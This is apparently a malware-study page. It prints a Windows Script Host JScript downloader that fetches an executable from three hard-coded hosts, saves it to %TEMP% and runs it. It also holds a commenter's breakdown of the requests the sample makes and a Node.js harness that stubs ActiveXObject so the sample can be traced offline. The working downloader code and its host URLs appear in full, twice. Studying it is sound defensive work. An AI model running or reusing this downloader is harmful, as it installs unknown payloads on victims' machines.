#1 Simple malware deobfuscation for study purposes
// Source: https://github.com/HynekPetrak/javascript-malware-collection/blob/master/2015/20150814/20150814_4a28a7fe949b6e449bc8d595ca196417.js
// JScript downloader written for a host that exposes ActiveXObject (Windows Script Host). It fetches an
// executable from one of three hosts, drops it in %TEMP% and launches it. Study only; never run it outside a sandbox.
var stroke = "5557545E0D0A020B24060108130B0B000A1D4A070B09"; // static token sent as the "id" query parameter
var x = '';  // unused
var vi = ''; // unused
function dl(fr) {
    // Three hard-coded download hosts, tried in order until one delivers a payload
    var b = "idsecurednow.com laterrazzafiorita.it ihaveavoice2.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        // Drop path: %TEMP%\<random number>.exe (char 92 is the backslash)
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0; // set to 1 once a payload has been written and launched
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1; // adTypeBinary
                xa.write(xo.ResponseBody);
                // Only bodies larger than 5000 bytes count as a payload (skips error pages and empty replies)
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2); // adSaveCreateOverWrite
                    try {
                        ws.Run(fn, 1, 0); // launch the dropped file: normal window, do not wait for it to exit
                    } catch (er) {};
                };
                xa.close();
            };
        };
        try {
            // Synchronous GET; "rnd" is the caller's argument, "id" is the static token above
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false);
            xo.send();
        } catch (er) {};
        if (dn == 1) break; // stop trying the remaining hosts once a payload ran
    };
};
// Three rounds with different "rnd" values
dl(6441);
dl(802);
dl(1483);
jcesarstef commented Mar 14, 2019

Questions

  1. What does this malware do?
    Tries to download a file (Line 32) to "%TEMP%\36619621.exe" (random number) (Line 11 / Line 23), then tries to execute it (Line 24)

  2. External requests

GET http://idsecurednow.com/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=6441&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://idsecurednow.com/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=802&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://idsecurednow.com/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://laterrazzafiorita.it/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
GET http://ihaveavoice2.com/document.php?rnd=1483&id=5557545E0D0A020B24060108130B0B000A1D4A070B09
  3. What technologies does it use?
    Internet Explorer Browser
    Microsoft® JScript® (ActiveXObject) - to interact with applications on the target host
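The request list in the comment was worked out by hand. The following is an added example, not part of the gist or of the malware collection it cites: it runs the sample above under Node.js with ActiveXObject replaced by stubs for WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream, so nothing touches the network or the disk, and it records every request, file write and Run call. The %TEMP% path and the server responses are made up for the sandbox; the responder callback decides which hosts "answer" and with how many bytes.

```javascript
// Added example: minimal WSH emulation for studying the downloader offline.
// Assumes Node.js. Nothing here is the malware's or the gist author's code
// except the SAMPLE string, which is the sample from the page unchanged.
const SAMPLE = `
var stroke = "5557545E0D0A020B24060108130B0B000A1D4A070B09";
var x = '';
var vi = '';
function dl(fr) {
  var b = "idsecurednow.com laterrazzafiorita.it ihaveavoice2.com".split(" ");
  for (var i = 0; i < b.length; i++) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
    var dn = 0;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
      if (xo.readyState == 4 && xo.status == 200) {
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        if (xa.size > 5000) {
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn, 2);
          try {
            ws.Run(fn, 1, 0);
          } catch (er) {};
        };
        xa.close();
      };
    };
    try {
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false);
      xo.send();
    } catch (er) {};
    if (dn == 1) break;
  };
};
dl(6441);
dl(802);
dl(1483);
`;

// Run `source` with a fake ActiveXObject. `responder(request)` returns the body
// (a string) the host would serve, or null to simulate a connection failure.
function runSandboxed(source, responder) {
  const log = { requests: [], files: [], runs: [] };
  const fakeTemp = "C:\\Users\\victim\\AppData\\Local\\Temp"; // assumed path, not a real host
  const progIds = {
    "WScript.Shell": () => ({
      ExpandEnvironmentStrings: (s) => s.replace("%TEMP%", fakeTemp),
      Run: (cmd, style, wait) => { log.runs.push(cmd); },   // record instead of executing
    }),
    "MSXML2.XMLHTTP": () => {
      const req = { readyState: 0, status: 0, ResponseBody: null, onreadystatechange: null, url: null };
      req.open = (method, url) => { req.url = method + " " + url; };
      req.send = () => {
        log.requests.push(req.url);
        const body = responder(req.url);
        if (body === null) throw new Error("connection failed"); // lands in the sample's try/catch
        req.status = 200; req.ResponseBody = body; req.readyState = 4;
        if (req.onreadystatechange) req.onreadystatechange();     // sync XMLHTTP still fires the handler
      };
      return req;
    },
    "ADODB.Stream": () => {
      const stream = { type: 0, position: 0, size: 0 };
      stream.open = () => {}; stream.close = () => {};
      stream.write = (body) => { stream.size = body.length; };    // size drives the > 5000 check
      stream.saveToFile = (path, mode) => { log.files.push({ path, size: stream.size, mode }); };
      return stream;
    },
  };
  function ActiveXObject(progId) {
    if (!progIds[progId]) throw new Error("unstubbed ProgID: " + progId);
    return progIds[progId]();
  }
  new Function("ActiveXObject", source)(ActiveXObject); // the sample only ever sees our stub
  return log;
}

// Scenario 1: every host unreachable, so each dl() call walks the whole list.
const allDown = runSandboxed(SAMPLE, () => null);
// Scenario 2: the second host serves a 6000-byte body, so the loop breaks after it.
const secondUp = runSandboxed(SAMPLE, (r) => r.includes("laterrazzafiorita.it") ? "M".repeat(6000) : null);
console.log(allDown.requests.length + " requests, " + allDown.runs.length + " executions");
console.log(secondUp.requests.length + " requests, " + secondUp.runs.length + " executions");
console.log(secondUp.files.map((f) => f.path).join("\n"));
```

With all three hosts down the sandbox logs the same nine GETs as the list above, in the same order; with a host serving more than 5000 bytes the sample stops after that host on every round, so only six requests, three file writes and three Run calls appear. A host that answers with a small page (an error page, for instance) is treated like a failure and the loop moves on. The same stub pattern extends to other ProgIDs when a sample asks for one the sandbox does not know: the thrown "unstubbed ProgID" error tells you which to add next.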
